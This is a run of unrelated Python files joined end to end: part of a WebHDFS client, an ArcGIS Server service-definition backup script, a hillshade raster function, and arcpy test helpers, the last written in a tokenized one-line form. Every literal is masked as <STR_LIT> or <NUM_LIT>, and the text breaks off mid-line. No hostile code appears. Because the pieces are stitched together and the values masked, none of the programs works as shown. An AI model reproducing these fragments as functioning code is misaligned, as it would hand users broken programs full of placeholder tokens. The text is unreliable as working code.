        logger.debug("<STR_LIT>" % (response.status, response.reason))
        httpClient.close()
        fileUploadClient.close()
        CheckResponseError(response)

    def appendToHDFS(self, source_path, target_path):
        # Same redirect dance as copyToHDFS, but using POST (append).
        url_path = WEBHDFS_CONTEXT_ROOT + target_path + '<STR_LIT>' + self.username
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT:POST>', url_path, headers={})
        response = httpClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason, response.msg))
        redirect_location = response.msg["<STR_LIT:location>"]
        logger.debug("<STR_LIT>" % (redirect_location))
        result = urlparse.urlparse(redirect_location)
        redirect_host = result.netloc[:result.netloc.index("<STR_LIT::>")]
        redirect_port = result.netloc[(result.netloc.index("<STR_LIT::>") + <NUM_LIT:1>):]
        redirect_path = result.path + "<STR_LIT:?>" + result.query
        logger.debug("<STR_LIT>" % (redirect_host, redirect_port, redirect_path))
        fileUploadClient = httplib.HTTPConnection(redirect_host,
                                                  redirect_port, timeout=<NUM_LIT>)
        fileUploadClient.request('<STR_LIT:POST>', redirect_path, open(source_path, "<STR_LIT:rb>"), headers={})
        response = fileUploadClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason))
        httpClient.close()
        fileUploadClient.close()
        CheckResponseError(response)

    def copyFromHDFS(self, source_path, target_path, overwrite=False):
        # Refuse to clobber an existing local file unless overwrite is set.
        if os.path.isfile(target_path) and overwrite == False:
            raise WebHDFSError("<STR_LIT>" + target_path + "<STR_LIT>")
        url_path = WEBHDFS_CONTEXT_ROOT + source_path + '<STR_LIT>' + self.username
        logger.debug("<STR_LIT>" % url_path)
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT:GET>', url_path, headers={})
        response = httpClient.getresponse()
        # No body length -> no datanode redirect; presumably a zero-length
        # file, so just create an empty local target -- TODO confirm.
        if response.length != None:
            msg = response.msg
            redirect_location = msg["<STR_LIT:location>"]
            logger.debug("<STR_LIT>" % (response.status, response.reason))
            logger.debug("<STR_LIT>" % (redirect_location))
            result = urlparse.urlparse(redirect_location)
            redirect_host = result.netloc[:result.netloc.index("<STR_LIT::>")]
            redirect_port = result.netloc[(result.netloc.index("<STR_LIT::>") + <NUM_LIT:1>):]
            redirect_path = result.path + "<STR_LIT:?>" + result.query
            logger.debug("<STR_LIT>" % (redirect_host, redirect_port, redirect_path))
            fileDownloadClient = httplib.HTTPConnection(redirect_host,
                                                        redirect_port, timeout=<NUM_LIT>)
            fileDownloadClient.request('<STR_LIT:GET>', redirect_path, headers={})
            response = fileDownloadClient.getresponse()
            logger.debug("<STR_LIT>" % (response.status, response.reason))
            # Stream the body to disk in fixed-size chunks.
            rcv_buf_size = <NUM_LIT> * <NUM_LIT>
            target_file = open(target_path, "<STR_LIT:wb>")
            while True:
                resp = response.read(rcv_buf_size)
                if len(resp) == <NUM_LIT:0>:
                    break
                target_file.write(resp)
            target_file.close()
            fileDownloadClient.close()
        else:
            target_file = open(target_path, "<STR_LIT:wb>")
            target_file.close()
        httpClient.close()
        CheckResponseError(response)

    def getFileStatus(self, path):
        url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self.username
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT:GET>', url_path, headers={})
        response = httpClient.getresponse()
        data_dict = json.loads(response.read())
        httpClient.close()
        CheckResponseError(response)
        # Missing key -> sentinel default rather than an exception.
        try:
            return data_dict['<STR_LIT>']
        except:
            return '<STR_LIT>'

    def listDir(self, path):
        # Returns just the entry names under `path`.
        url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self.username
        logger.debug("<STR_LIT>" + url_path)
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT:GET>', url_path, headers={})
        response = httpClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason))
        data_dict = json.loads(response.read())
        httpClient.close()
        CheckResponseError(response)
        logger.debug("<STR_LIT>" + str(data_dict))
        files = []
        try:
            for i in data_dict["<STR_LIT>"]["<STR_LIT>"]:
                logger.debug(i["<STR_LIT:type>"] + "<STR_LIT>" + i["<STR_LIT>"])
                files.append(i["<STR_LIT>"])
        except:
            # Unexpected payload shape -> empty listing.
            pass
        return files

    def listDirEx(self, path):
        # Like listDir, but returns the full per-entry status dicts.
        url_path = WEBHDFS_CONTEXT_ROOT + path + '<STR_LIT>' + self.username
        logger.debug("<STR_LIT>" + url_path)
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT:GET>', url_path, headers={})
        response = httpClient.getresponse()
        logger.debug("<STR_LIT>" % (response.status, response.reason))
        data_dict = json.loads(response.read())
        httpClient.close()
        CheckResponseError(response)
        logger.debug("<STR_LIT>" + str(data_dict))
        try:
            return data_dict["<STR_LIT>"]["<STR_LIT>"]
        except:
            return []

    def getHomeDir(self):
        url_path = WEBHDFS_CONTEXT_ROOT + '<STR_LIT>' + self.username
        httpClient = self.__getNameNodeHTTPClient()
        httpClient.request('<STR_LIT:GET>', url_path, headers={})
        response = httpClient.getresponse()
        data_dict = json.loads(response.read())
        httpClient.close()
        CheckResponseError(response)
        try:
            return data_dict['<STR_LIT>']
        except:
            return '<STR_LIT>'

    def __getNameNodeHTTPClient(self):
        # A fresh connection per call; callers close it themselves.
        httpClient = httplib.HTTPConnection(self.namenode_host, self.namenode_port, timeout=<NUM_LIT>)
        return httpClient


class WebHDFSError(Exception):
    # Default shown when no reason is supplied.
    reason = '<STR_LIT>'

    def __init__(self, reason):
        self.reason = reason

    def __str__(self):
        return self.reason


def CheckResponseError(response):
    # Raise for any HTTP status at or above the error threshold.
    if response != None and response.status >= <NUM_LIT>:
        raise WebHDFSError('<STR_LIT>'.format(response.status, response.reason))


if __name__ == '<STR_LIT:__main__>':
    # Smoke-test sequence against a hard-coded cluster: mkdir, upload,
    # download, list, recursive delete.
    try:
        webhdfs = WebHDFS('<STR_LIT>', <NUM_LIT>, '<STR_LIT>')
        webhdfs.mkDir('<STR_LIT>')
        resp = webhdfs.copyToHDFS('<STR_LIT>', '<STR_LIT>', overwrite=True)
        webhdfs.copyFromHDFS('<STR_LIT>', '<STR_LIT>', overwrite=True)
        webhdfs.listDir('<STR_LIT>')
        webhdfs.delete('<STR_LIT>', recursive=True)
    except WebHDFSError as whe:
        print whe
    except:
        print "<STR_LIT>" + str(sys.exc_info())
    else:
        print '<STR_LIT>'
# Backs up ArcGIS Server service-definition (.sd) files together with the
# portal item properties of each published service.
# Python 2 script: print statements, the `<>` operator and dict.iteritems.
import sys, os, traceback, datetime, json, subprocess, tempfile
from walkingDirTrees import listFiles
from AGSRestFunctions import getServerDirectory
from AGSRestFunctions import getServiceList
from AGSRestFunctions import getServiceInfo
from shutil import copy2
from shutil import rmtree
from socket import getfqdn
import copy, json

# Make the bundled portalpy support module importable.
supportFilesPath = os.path.join(
    os.path.dirname(os.path.dirname(sys.argv[<NUM_LIT:0>])), '<STR_LIT>', '<STR_LIT>')
sys.path.append(supportFilesPath)
from portalpy import Portal

# Path to the 7-Zip executable used to crack open .sd archives.
sevenZipExePath = r'<STR_LIT>'
scriptName = sys.argv[<NUM_LIT:0>]
exitErrCode = <NUM_LIT:1>
debug = False
sdFilePattern = '<STR_LIT>'
sectionBreak = '<STR_LIT:=>' * <NUM_LIT>
sectionBreak1 = '<STR_LIT:->' * <NUM_LIT>


def check_args():
    # Parse and validate the command line; returns the parsed tuple, or
    # None (caller exits) after printing usage / the specific error.
    if len(sys.argv) < <NUM_LIT:6>:
        print '<STR_LIT:\n>' + scriptName + '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        print '<STR_LIT>'
        return None
    else:
        server = sys.argv[<NUM_LIT:1>]
        port = sys.argv[<NUM_LIT:2>]
        adminuser = sys.argv[<NUM_LIT:3>]
        password = sys.argv[<NUM_LIT:4>]
        exeType = sys.argv[<NUM_LIT:5>]
        targetFolder = None
        specified_users = None
        users = None
        if len(sys.argv) >= <NUM_LIT:7>:
            targetFolder = sys.argv[<NUM_LIT:6>]
        if len(sys.argv) >= <NUM_LIT:8>:
            specified_users = sys.argv[<NUM_LIT:7>]
        # '#' is the sentinel meaning "use the default port".
        if port.strip() == '<STR_LIT:#>':
            port = None
        exeType = exeType.upper().strip()
        if exeType <> '<STR_LIT>' and exeType <> '<STR_LIT>':
            print '<STR_LIT>'
            return None
        if exeType == '<STR_LIT>':
            doCopy = True
        else:
            doCopy = False
        if doCopy:
            # When copying, the target folder must exist and be empty.
            if not targetFolder:
                print '<STR_LIT>'
                return None
            if not os.path.exists(targetFolder):
                print '<STR_LIT>' + targetFolder + '<STR_LIT>'
                return None
            if len(os.listdir(targetFolder)) > <NUM_LIT:0>:
                print '<STR_LIT>' + targetFolder + '<STR_LIT>'
                return None
        if specified_users:
            # Strip spaces then split the comma-separated user list.
            users = specified_users.replace('<STR_LIT:U+0020>', '<STR_LIT>').split('<STR_LIT:U+002C>')
        return server, port, adminuser, password, doCopy, targetFolder, users


def extractFromSDFile(sdFile, extractFolder, fileToExtract=None):
    '''<STR_LIT>'''
    # Shell out to 7-Zip; returns its process exit code.
    exeArgs = '<STR_LIT>'.format(sevenZipExePath, sdFile, extractFolder)
    if fileToExtract:
        exeArgs += '<STR_LIT>'.format(fileToExtract)
    exeArgs += '<STR_LIT>'
    exitCode = subprocess.call(exeArgs)
    return exitCode


def get_sd_files(sdRootFolder):
    '''<STR_LIT>'''
    # Build {service key -> newest matching .sd file} by reading the
    # service config json embedded in each archive.
    fileInfo = dict()
    extractFolder = tempfile.mkdtemp()
    sdFilePaths = listFiles(sdRootFolder, sdFilePattern)
    for sdFile in sdFilePaths:
        extractFile = '<STR_LIT>'
        jsonFile = os.path.join(extractFolder, extractFile)
        extractFromSDFile(sdFile, extractFolder, extractFile)
        os.chdir(extractFolder)
        serviceConfig = json.load(open(extractFile))
        folderName = serviceConfig['<STR_LIT>']
        serviceName = serviceConfig['<STR_LIT>']['<STR_LIT>']
        serviceType = serviceConfig['<STR_LIT>']['<STR_LIT:type>']
        # Key matches the AGS service identifier: [folder//]name.type
        fileKey = serviceName + '<STR_LIT:.>' + serviceType
        if folderName:
            fileKey = folderName + '<STR_LIT>' + fileKey
        creationTime = os.path.getctime(sdFile)
        modifiedTime = os.path.getmtime(sdFile)
        # Modification time is what decides "newest" here.
        compareTime = modifiedTime
        if fileKey in fileInfo:
            fileTime = fileInfo[fileKey]['<STR_LIT>']
            if compareTime > fileTime:
                fileInfo[fileKey] = {'<STR_LIT:path>': sdFile, '<STR_LIT>': compareTime}
        else:
            fileInfo[fileKey] = {'<STR_LIT:path>': sdFile, '<STR_LIT>': compareTime}
    if debug:
        print '<STR_LIT>'
        print '<STR_LIT>'
        for i in fileInfo:
            print i + '<STR_LIT>' + fileInfo[i]['<STR_LIT:path>'] + '<STR_LIT>' + str(fileInfo[i]['<STR_LIT>'])
    return fileInfo


def get_ags_services(server, port, adminuser, password):
    '''<STR_LIT>'''
    # Query the server for every service (minus an exclusion list) and
    # fetch each service's full info dict.
    agsServices = {}
    allServices = getServiceList(server, port, adminuser, password)
    excludeServices = ['<STR_LIT>']
    services = [service for service in allServices if service not in excludeServices]
    for service in services:
        # Service ids look like "folder//name.type"; split folder off.
        parsedService = service.split('<STR_LIT>')
        folder = None
        if len(parsedService) == <NUM_LIT:1>:
            serviceNameType = parsedService[<NUM_LIT:0>]
        else:
            folder = parsedService[<NUM_LIT:0>]
            serviceNameType = parsedService[<NUM_LIT:1>]
        info = getServiceInfo(server, port, adminuser, password, folder, serviceNameType)
        agsServices[service] = info
    if debug:
        print "<STR_LIT>"
        print "<STR_LIT>"
        print agsServices
    return agsServices


def filesToCopy(sdFiles, agsServices, copyItemIDs=None):
    '''<STR_LIT>'''
    # Select the .sd files for services that exist on the server; when
    # copyItemIDs is given, keep only services whose portal items match.
    sdFilesToCopy = {}
    for i in agsServices:
        serviceInfo = agsServices[i]
        portalItemsJson = serviceInfo['<STR_LIT>']['<STR_LIT>']
        if i in sdFiles:
            if copyItemIDs:
                if portalItemsJson:
                    for portalItemJson in portalItemsJson:
                        itemID = portalItemJson['<STR_LIT>']
                        if itemID in copyItemIDs:
                            sdFilesToCopy[i] = sdFiles[i]
            else:
                sdFilesToCopy[i] = sdFiles[i]
    if debug:
        print '<STR_LIT>'
        print '<STR_LIT>'
        for key, value in sdFilesToCopy.iteritems():
            print str(key) + '<STR_LIT>' + str(value)
    return sdFilesToCopy


def copySDFiles(sdFilesToCopy, targetFolder, agsServices, portalProps):
    '''<STR_LIT>'''
    # Copy each selected .sd into the target folder (preserving its parent
    # folder name) and drop two sidecar json files next to it: the service
    # info and the portal properties.
    print '<STR_LIT:\n>' + sectionBreak
    print '<STR_LIT>'
    print sectionBreak
    print '<STR_LIT>'.format('<STR_LIT>', '<STR_LIT:|>', '<STR_LIT>')
    print sectionBreak1
    for service, serviceInfo in sdFilesToCopy.iteritems():
        sdFilePath = serviceInfo['<STR_LIT:path>']
        sdFile = os.path.basename(sdFilePath)
        sdParentFolder = os.path.basename(os.path.dirname(sdFilePath))
        outputFolder = os.path.join(targetFolder, sdParentFolder)
        outputFilePath = os.path.join(outputFolder, sdFile)
        print '<STR_LIT>'.format(service, '<STR_LIT:|>', '<STR_LIT>' + sdFilePath)
        print '<STR_LIT>'.format('<STR_LIT:|>', '<STR_LIT>' + outputFilePath)
        if not os.path.exists(outputFolder):
            os.makedirs(outputFolder)
        copy2(sdFilePath, outputFilePath)
        os.chdir(outputFolder)
        serviceInfo = agsServices[service]
        json.dump(serviceInfo, open(os.path.splitext(sdFile)[<NUM_LIT:0>] + '<STR_LIT>', '<STR_LIT:w>'))
        props = portalProps[service]
        json.dump(props, open(os.path.splitext(sdFile)[<NUM_LIT:0>] + '<STR_LIT>', '<STR_LIT:w>'))
    print sectionBreak


def getPortalPropsForServices(portal, agsServices):
    # Enrich each service's portal-item references with live portal data
    # (item info, sharing, groups); flags items that no longer exist.
    allServicesProps = None
    if not agsServices:
        return None
    allServicesProps = {}
    for service, info in agsServices.iteritems():
        # NOTE(review): allTags is assigned but never used in this loop.
        allTags = []
        props = info.get('<STR_LIT>')
        if props:
            outProps = copy.deepcopy(props)
            portalItems = props['<STR_LIT>']
            print '<STR_LIT:->' * <NUM_LIT>
            for i in range(len(portalItems)):
                itemID = portalItems[i]['<STR_LIT>']
                itemType = portalItems[i]['<STR_LIT:type>']
                item = portal.item(itemID)
                if not item:
                    # Referenced item no longer exists on the portal.
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = False
                    print '<STR_LIT>' + service + '<STR_LIT>' + itemID + '<STR_LIT>' + itemType + '<STR_LIT>'
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = None
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = None
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = None
                    continue
                else:
                    groups = []
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = True
                    print '<STR_LIT>' + service + '<STR_LIT>' + itemID + '<STR_LIT>' + itemType + '<STR_LIT:)>'
                    item_info, item_sharing, item_folder_id = portal.user_item(itemID)
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = item_info
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = item_sharing
                    # Resolve each shared-with group id to its full record.
                    group_ids = item_sharing['<STR_LIT>']
                    for group_id in group_ids:
                        groups.append(portal.group(group_id))
                    outProps['<STR_LIT>'][i]['<STR_LIT>'] = groups
            allServicesProps[service] = outProps
    return allServicesProps


def getPortalTags(portal, itemIDs):
    '''<STR_LIT>'''
    # Union of tags across the given items; None when there are no tags.
    allTags = []
    for itemID in itemIDs:
        tags = portal.item(itemID).get('<STR_LIT>')
        if tags:
            allTags.extend(tags)
    uniqueTags = list(set(allTags))
    if len(uniqueTags) == <NUM_LIT:0>:
        uniqueTags = None
    return uniqueTags


def report(sdFiles, agsServices):
    '''<STR_LIT>'''
    # Print a service -> .sd file table plus summary counts, flagging
    # services with no matching .sd file.
    sectionLen = <NUM_LIT>
    totalNumServices = len(agsServices.keys())
    totalNumSDFiles = len(sdFiles.keys())
    totalNumMissingSDFiles = <NUM_LIT:0>
    print '<STR_LIT>' + sectionBreak
    print '<STR_LIT>'
    print sectionBreak
    print '<STR_LIT>'.format('<STR_LIT>', '<STR_LIT:|>', '<STR_LIT>')
    print sectionBreak1
    for service in agsServices:
        if service in sdFiles:
            printLine = '<STR_LIT>'.format(service, '<STR_LIT:|>', sdFiles[service]['<STR_LIT:path>'])
        else:
            totalNumMissingSDFiles = totalNumMissingSDFiles + <NUM_LIT:1>
            printLine = '<STR_LIT>'.format(service, '<STR_LIT:|>', '<STR_LIT>')
        print printLine
    print sectionBreak1
    print '<STR_LIT>'
    print '<STR_LIT>'.format('<STR_LIT>', totalNumServices)
    print '<STR_LIT>'.format('<STR_LIT>', totalNumSDFiles)
    if totalNumMissingSDFiles == <NUM_LIT:0>:
        printLine = '<STR_LIT>'.format('<STR_LIT>', totalNumMissingSDFiles)
    else:
        printLine = '<STR_LIT>'.format('<STR_LIT>', totalNumMissingSDFiles, '<STR_LIT>')
    print printLine
    print sectionBreak


def getItemsIDs(portal, users):
    # Search the portal for each user's items, keeping ids of items that
    # have a service URL; None when nothing matched.
    ids = []
    for user in users:
        q = '<STR_LIT>' + user
        items = portal.search(['<STR_LIT:id>', '<STR_LIT:type>', '<STR_LIT:url>', '<STR_LIT:title>', '<STR_LIT>'], q)
        if items:
            for item in items:
                if item.get('<STR_LIT:url>'):
                    ids.append(item.get('<STR_LIT:id>'))
    if len(ids) == <NUM_LIT:0>:
        ids = None
    return ids


def main():
    # Orchestrates the whole run; exits 0 on success, 1 on any failure.
    totalSuccess = True
    if not os.path.exists(sevenZipExePath):
        print '<STR_LIT>' + sevenZipExePath + '<STR_LIT>'
        sys.exit(exitErrCode)
    results = check_args()
    if not results:
        sys.exit(exitErrCode)
    try:
        server, port, adminuser, password, doCopy, targetFolder, users = results
        if debug:
            print server, port, adminuser, password, doCopy, targetFolder, users
        # .sd files live under the server's uploads directory.
        uploadsFolderInfo = getServerDirectory(server, port, adminuser, password, "<STR_LIT>")
        sdRootFolder = os.path.join(uploadsFolderInfo['<STR_LIT>'], '<STR_LIT>')
        print '<STR_LIT>' + sdRootFolder + '<STR_LIT:\n>'
        if not os.path.exists(sdRootFolder):
            print '<STR_LIT>' + sdRootFolder + '<STR_LIT>'
            sys.exit(exitErrCode)
        sdFiles = get_sd_files(sdRootFolder)
        agsServices = get_ags_services(server, port, adminuser, password)
        portal = Portal('<STR_LIT>' + server + '<STR_LIT>', adminuser, password)
        props = getPortalPropsForServices(portal, agsServices)
        userItemIDs = None
        if users:
            userItemIDs = getItemsIDs(portal, users)
        sdFilesToCopy = filesToCopy(sdFiles, agsServices, userItemIDs)
        if doCopy:
            copySDFiles(sdFilesToCopy, targetFolder, agsServices, props)
        report(sdFilesToCopy, agsServices)
        print '<STR_LIT>'
    except:
        # Top-level catch: report the traceback, exit non-zero in finally.
        totalSuccess = False
        tb = sys.exc_info()[<NUM_LIT:2>]
        tbinfo = traceback.format_tb(tb)[<NUM_LIT:0>]
        pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str(sys.exc_info()[<NUM_LIT:1>])
        print
        print "<STR_LIT>"
        print pymsg + "<STR_LIT:\n>"
    finally:
        if totalSuccess:
            sys.exit(<NUM_LIT:0>)
        else:
            sys.exit(<NUM_LIT:1>)


if __name__ == "<STR_LIT:__main__>":
    main()
# ArcGIS-style Python raster function computing a hillshade from a
# single-band elevation raster via Sobel gradients.
from scipy import ndimage
import numpy as np
import math
from utils import computeCellSize, Projection, isGeographic


class Hillshade():
    def __init__(self):
        self.name = "<STR_LIT>"
        self.description = "<STR_LIT>"
        # Initialize the illumination/scale state with defaults.
        self.prepare()
        self.proj = Projection()

    def getParameterInfo(self):
        # Describes the raster-function parameters: input DEM plus three
        # numeric tuning knobs (defaults below are sanitized literals).
        return [
            {
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT:value>': None,
                '<STR_LIT>': True,
                '<STR_LIT>': "<STR_LIT>",
                '<STR_LIT:description>': "<STR_LIT>",
            },
            {
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT:value>': <NUM_LIT:1.>,
                '<STR_LIT>': False,
                '<STR_LIT>': "<STR_LIT>",
                '<STR_LIT:description>': ("<STR_LIT>"
                                          "<STR_LIT>"),
            },
            {
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT:value>': <NUM_LIT>,
                '<STR_LIT>': False,
                '<STR_LIT>': "<STR_LIT>",
                '<STR_LIT:description>': ("<STR_LIT>"
                                          "<STR_LIT>"),
            },
            {
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT:value>': <NUM_LIT>,
                '<STR_LIT>': False,
                '<STR_LIT>': "<STR_LIT>",
                '<STR_LIT:description>': ("<STR_LIT>"
                                          "<STR_LIT>"
                                          "<STR_LIT>"),
            },
        ]

    def getConfiguration(self, **scalars):
        # Raster-function configuration flags; the bitmask values are
        # framework-defined -- TODO confirm meanings against the SDK.
        return {
            '<STR_LIT>': (<NUM_LIT:0>,),
            '<STR_LIT>': <NUM_LIT:4> | <NUM_LIT:8>,
            '<STR_LIT>': <NUM_LIT:2> | <NUM_LIT:4> | <NUM_LIT:8>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': True
        }

    def updateRasterInfo(self, **kwargs):
        # Output is a single band with a fixed statistics range; input must
        # be single-band (hillshade is undefined on multiband rasters).
        kwargs['<STR_LIT>']['<STR_LIT>'] = <NUM_LIT:1>
        kwargs['<STR_LIT>']['<STR_LIT>'] = '<STR_LIT>'
        kwargs['<STR_LIT>']['<STR_LIT>'] = ({'<STR_LIT>': <NUM_LIT:0.>, '<STR_LIT>': <NUM_LIT>},)
        kwargs['<STR_LIT>']['<STR_LIT>'] = ()
        kwargs['<STR_LIT>']['<STR_LIT>'] = False
        kwargs['<STR_LIT>']['<STR_LIT>'] = ()
        r = kwargs['<STR_LIT>']
        if r['<STR_LIT>'] > <NUM_LIT:1>:
            raise Exception("<STR_LIT>")
        # Recompute illumination constants from the incoming parameters.
        self.prepare(zFactor=kwargs.get('<STR_LIT>', <NUM_LIT:1.>),
                     cellSizeExponent=kwargs.get('<STR_LIT>', <NUM_LIT>),
                     cellSizeFactor=kwargs.get('<STR_LIT>', <NUM_LIT>),
                     sr=r['<STR_LIT>'])
        return kwargs

    def updatePixels(self, tlc, shape, props, **pixelBlocks):
        v = np.array(pixelBlocks['<STR_LIT>'], dtype='<STR_LIT>', copy=False)
        m = np.array(pixelBlocks['<STR_LIT>'], dtype='<STR_LIT>', copy=False)
        dx, dy = self.computeGradients(v, props)
        outBlock = self.computeHillshade(dx, dy)
        # Trim the one-pixel convolution border from the output block.
        pixelBlocks['<STR_LIT>'] = outBlock[<NUM_LIT:1>:-<NUM_LIT:1>, <NUM_LIT:1>:-<NUM_LIT:1>].astype(props['<STR_LIT>'], copy=False)
        # A pixel is valid only when its whole 3x3 neighborhood is valid:
        # AND of the mask shifted over all nine neighbor offsets.
        pixelBlocks['<STR_LIT>'] = m[:-<NUM_LIT:2>, :-<NUM_LIT:2>] & m[<NUM_LIT:1>:-<NUM_LIT:1>, :-<NUM_LIT:2>] & m[<NUM_LIT:2>:, :-<NUM_LIT:2>] & m[:-<NUM_LIT:2>, <NUM_LIT:1>:-<NUM_LIT:1>] & m[<NUM_LIT:1>:-<NUM_LIT:1>, <NUM_LIT:1>:-<NUM_LIT:1>] & m[<NUM_LIT:2>:, <NUM_LIT:1>:-<NUM_LIT:1>] & m[:-<NUM_LIT:2>, <NUM_LIT:2>:] & m[<NUM_LIT:1>:-<NUM_LIT:1>, <NUM_LIT:2>:] & m[<NUM_LIT:2>:, <NUM_LIT:2>:]
        return pixelBlocks

    def updateKeyMetadata(self, names, bandIndex, **keyMetadata):
        # bandIndex -1 is dataset-level metadata; 0 is the sole output band.
        if bandIndex == -<NUM_LIT:1>:
            keyMetadata['<STR_LIT>'] = '<STR_LIT>'
        elif bandIndex == <NUM_LIT:0>:
            keyMetadata['<STR_LIT>'] = None
            keyMetadata['<STR_LIT>'] = None
            keyMetadata['<STR_LIT>'] = '<STR_LIT>'
        return keyMetadata

    def prepare(self, azimuth=<NUM_LIT>, elevation=<NUM_LIT>, zFactor=<NUM_LIT:1.>,
                cellSizeExponent=<NUM_LIT>, cellSizeFactor=<NUM_LIT>, sr=None):
        # Precompute the sun-vector trigonometry (zenith Z from elevation,
        # azimuth A converted to math convention) and the Sobel kernels.
        Z = (<NUM_LIT> - elevation) * math.pi / <NUM_LIT>
        A = (<NUM_LIT> - azimuth) * math.pi / <NUM_LIT>
        sinZ = math.sin(Z)
        self.cosZ = math.cos(Z)
        self.sinZsinA = sinZ * math.sin(A)
        self.sinZcosA = sinZ * math.cos(A)
        # 3x3 Sobel kernels for the horizontal/vertical gradients.
        self.xKernel = [[<NUM_LIT:1>, <NUM_LIT:0>, -<NUM_LIT:1>], [<NUM_LIT:2>, <NUM_LIT:0>, -<NUM_LIT:2>], [<NUM_LIT:1>, <NUM_LIT:0>, -<NUM_LIT:1>]]
        self.yKernel = [[<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:1>], [<NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:0>], [-<NUM_LIT:1>, -<NUM_LIT:2>, -<NUM_LIT:1>]]
        self.zf = zFactor
        self.ce = cellSizeExponent
        self.cf = cellSizeFactor
        self.sr = sr

    def computeGradients(self, pixelBlock, props):
        # Scale factors depend on the cell size (re-projected when an
        # output spatial reference was supplied); geographic coordinates
        # are converted with a degrees-to-meters style multiplier.
        p = props['<STR_LIT>'] if self.sr is None else computeCellSize(props, self.sr, self.proj)
        if p is not None and len(p) == <NUM_LIT:2>:
            p = np.multiply(p, <NUM_LIT> if isGeographic(props['<STR_LIT>']) else <NUM_LIT:1.>)
            # Per-axis scale: (zFactor + cellSize^exponent * factor) / (8 * cellSize)
            xs, ys = (self.zf + (np.power(p, self.ce) * self.cf)) / (<NUM_LIT:8> * p)
        else:
            xs, ys = <NUM_LIT:1.>, <NUM_LIT:1.>
        return (ndimage.convolve(pixelBlock, self.xKernel) * xs, ndimage.convolve(pixelBlock, self.yKernel) * ys)

    def computeHillshade(self, dx, dy):
        # Standard Lambertian hillshade, clipped to the 8-bit output range.
        return np.clip(<NUM_LIT:255> * (self.cosZ + dy * self.sinZsinA - dx * self.sinZcosA) / np.sqrt(<NUM_LIT:1.> + (dx * dx + dy * dy)), <NUM_LIT:0.>, <NUM_LIT>)


"""<STR_LIT>"""
<s> import arcpy <EOL> import os <EOL> currentPath = os . path . dirname ( __file__ ) <EOL> geodatabasePath = os . path . normpath ( os . path . join ( currentPath , r"<STR_LIT>" ) ) <EOL> scratchPath = geodatabasePath <EOL> toolboxesPath = os . path . normpath ( os . path . join ( currentPath , r"<STR_LIT>" ) ) <EOL> cibSourcePath = os . path . normpath ( os . path . join ( currentPath , r"<STR_LIT>" ) ) <EOL> scratchGDB = os . path . join ( scratchPath , "<STR_LIT>" ) <EOL> toolbox = os . path . join ( toolboxesPath , "<STR_LIT>" ) <EOL> def createScratch ( ) : <EOL> try : <EOL> arcpy . CreateFileGDB_management ( scratchPath , "<STR_LIT>" ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> def deleteScratch ( ) : <EOL> try : <EOL> arcpy . Delete_management ( scratchGDB ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> createScratch ( ) </s>
<s> import arcpy <EOL> import os <EOL> import sys <EOL> import traceback <EOL> import TestUtilities <EOL> def RunTest ( ) : <EOL> try : <EOL> arcpy . AddMessage ( "<STR_LIT>" ) <EOL> inputGpxFile = TestUtilities . gpxFile <EOL> outputPointsFC = os . path . join ( TestUtilities . outputGDB , "<STR_LIT>" ) <EOL> toolbox = TestUtilities . toolbox <EOL> print ( "<STR_LIT>" + str ( TestUtilities . currentPath ) ) <EOL> print ( "<STR_LIT>" + str ( TestUtilities . geodatabasePath ) ) <EOL> arcpy . env . overwriteOutput = True <EOL> arcpy . ImportToolbox ( toolbox , "<STR_LIT>" ) <EOL> arcpy . GPX2Layer_pdc ( inputGpxFile , outputPointsFC ) <EOL> outputFeatureCount = int ( arcpy . GetCount_management ( outputPointsFC ) . getOutput ( <NUM_LIT:0> ) ) <EOL> print ( "<STR_LIT>" + str ( outputPointsFC ) ) <EOL> print ( "<STR_LIT>" + str ( outputFeatureCount ) ) <EOL> if ( outputFeatureCount < <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" + str ( outputFeatureCount ) ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> except arcpy . ExecuteError : <EOL> msgs = arcpy . GetMessages ( ) <EOL> arcpy . AddError ( msgs ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> except Exception as e : <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> 